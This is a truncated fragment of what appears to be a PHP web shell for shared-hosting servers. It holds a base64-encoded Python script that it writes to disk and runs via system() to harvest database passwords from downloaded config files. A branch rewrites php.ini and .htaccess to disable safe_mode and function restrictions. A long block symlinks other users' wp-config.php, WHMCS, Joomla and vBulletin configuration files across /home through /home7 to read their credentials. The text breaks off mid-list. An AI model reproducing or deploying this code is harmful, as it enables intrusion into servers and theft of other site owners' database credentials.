GRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic='; $file = fopen("cp.py","w+"); $write = fwrite ($file ,base64_decode($cp)); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo"<center> <textarea cols=\"90\" rows=\"20\" name=\"usernames\">"; system("python cp.py $url config"); unlink ('cp.py'); echo"</textarea> </center>"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."> << BACK</a>"; exit; } if($_POST['matikan']=='sekatan'){ @error_reporting(0); $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ=='; $file = fopen("php.ini","w+"); $write = fwrite ($file ,base64_decode($phpini)); fclose($file); $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ=='; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); echo "<hr><center><b>DONE!"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; //all function here  function syml($usern,$pdomain)  {   symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'  vBulletin1.txt');   symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'  vBulletin2.txt');   symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  vBulletin3.txt');   symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'  vBulletin4.txt');   symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'  Phpbb1.txt');   symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  Phpbb2.txt');   symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'  Wordpress1.txt');   symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'  Wordpress2.txt');   symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'  Joomla1.txt');   symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'  Joomla2.txt');   symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'  Joomla3.txt');   symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'  Whm1.txt');   symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'  Whm2.txt');   symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'  Whm3.txt');   symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'  Whm4.txt');   symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'  Whm5.txt');   symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'  Whm6.txt');   symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'  Whm7.txt');   symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'  Whm8.txt');   symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'  Whm9.txt');   symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'  5.txt');   symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'  4.txt');   symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'  invisio.txt');   symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'  7.txt');   symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'  8.txt');   symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'  mk-portale1.txt');   symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'  12.txt');   symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'  Smf.txt');   symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'  phpbb3.txt');   symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'  infinity.txt');   symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'  vBulletin1.txt');   symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'  vBulletin2.txt');   symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  vBulletin3.txt');   symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'  vBulletin4.txt');   symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'  Phpbb1.txt');   symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  Phpbb2.txt');   symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'  Wordpress1.txt');   symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'  Wordpress2.txt');   symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'  Joomla1.txt');   symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'  Joomla2.txt');   symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'  Joomla3.txt');   symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'  Whm1.txt');   symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'  Whm2.txt');   symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'  Whm3.txt');   symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'  Whm4.txt');   symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'  Whm5.txt');   symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'  Whm6.txt');   symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'  Whm7.txt');   symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'  Whm8.txt');   symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'  Whm9.txt');   symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'  5.txt');   symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'  4.txt');   symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'  invisio.txt');   symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'  7.txt');   symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'  8.txt');   symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'  mk-portale1.txt');   symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'  12.txt');   symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'  Smf.txt');   symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'  phpbb3.txt');   symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'  infinity.txt');   symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'  vBulletin1.txt');   symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'  vBulletin2.txt');   symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  vBulletin3.txt');   symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'  vBulletin4.txt');   symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'  Phpbb1.txt');   symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  Phpbb2.txt');   symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'  Wordpress1.txt');   symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'  Wordpress2.txt');   symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'  Joomla1.txt');   symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'  Joomla2.txt');   symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'  Joomla3.txt');   symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'  Whm1.txt');   symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'  Whm2.txt');   symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'  Whm3.txt');   symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'  Whm4.txt');   symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'  Whm5.txt');   symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'  Whm6.txt');   symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'  Whm7.txt');   symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'  Whm8.txt');   symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'  Whm9.txt');   symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'  5.txt');   symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'  4.txt');   symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'  invisio.txt');   symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'  7.txt');   symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'  8.txt');   symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'  mk-portale1.txt');   symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'  12.txt');   symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'  Smf.txt');   symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'  phpbb3.txt');   symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'  infinity.txt');   symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'  vBulletin1.txt');   symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'  vBulletin2.txt');   symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  vBulletin3.txt');   symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'  vBulletin4.txt');   symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'  Phpbb1.txt');   symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  Phpbb2.txt');   symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'  Wordpress1.txt');   symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'  Wordpress2.txt');   symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'  Joomla1.txt');   symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'  Joomla2.txt');   symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'  Joomla3.txt');   symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'  Whm1.txt');   symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'  Whm2.txt');   symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'  Whm3.txt');   symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'  Whm4.txt');   symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'  Whm5.txt');   symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'  Whm6.txt');   symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'  Whm7.txt');   symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'  Whm8.txt');   symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'  Whm9.txt');   symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'  5.txt');   symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'  4.txt');   symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'  invisio.txt');   symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'  7.txt');   symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'  8.txt');   symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'  mk-portale1.txt');   symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'  12.txt');   symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'  Smf.txt');   symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'  phpbb3.txt');   symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'  infinity.txt');   symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'  vBulletin1.txt');   symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'  vBulletin2.txt');   symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  vBulletin3.txt');   symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'  vBulletin4.txt');   symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'  Phpbb1.txt');   symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  Phpbb2.txt');   symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'  Wordpress1.txt');   symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'  Wordpress2.txt');   symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'  Joomla1.txt');   symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'  Joomla2.txt');   symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'  Joomla3.txt');   symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'  Whm1.txt');   symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'  Whm2.txt');   symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'  Whm3.txt');   symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'  Whm4.txt');   symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'  Whm5.txt');   symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'  Whm6.txt');   symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'  Whm7.txt');   symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'  Whm8.txt');   symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'  Whm9.txt');   symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'  5.txt');   symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'  4.txt');   symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'  invisio.txt');   symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'  7.txt');   symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'  8.txt');   symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'  mk-portale1.txt');   symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'  12.txt');   symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'  Smf.txt');   symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'  phpbb3.txt');   symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'  infinity.txt');   symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'  vBulletin1.txt');   symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'  vBulletin2.txt');   symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  vBulletin3.txt');   symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'  vBulletin4.txt');   symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'  Phpbb1.txt');   symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  Phpbb2.txt');   symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'  Wordpress1.txt');   symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'  Wordpress2.txt');   symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'  Joomla1.txt');   symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'  Joomla2.txt');   symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'  Joomla3.txt');   symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'  Whm1.txt');   symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'  Whm2.txt');   symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'  Whm3.txt');   symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'  Whm4.txt');   symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'  Whm5.txt');   symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'  Whm6.txt');   symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'  Whm7.txt');   symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'  Whm8.txt');   symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'  Whm9.txt');   symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'  5.txt');   symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'  4.txt');   symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'  invisio.txt');   symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'  7.txt');   symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'  8.txt');   symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'  mk-portale1.txt');   symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'  12.txt');   symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'  Smf.txt');   symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'  phpbb3.txt');   symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'  infinity.txt');   symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'  vBulletin1.txt');   symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'  vBulletin2.txt');   symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  vBulletin3.txt');   symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'  vBulletin4.txt');   symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'  Phpbb1.txt');   symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'  Phpbb2.txt');   symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'  Wordpress1.txt');   symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'  Wordpress2.txt');   symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'  Joomla1.txt');   symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'  Joomla2.txt');   symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'  Joomla3.txt');   symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'  Whm1.txt');   symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'  Whm2.txt');   symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'  Whm3.txt');   symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'  Whm4.txt');   symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'  Whm5.txt');   symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'  Whm6.txt');   symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'  Whm7.txt');   symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'  Whm8.txt');   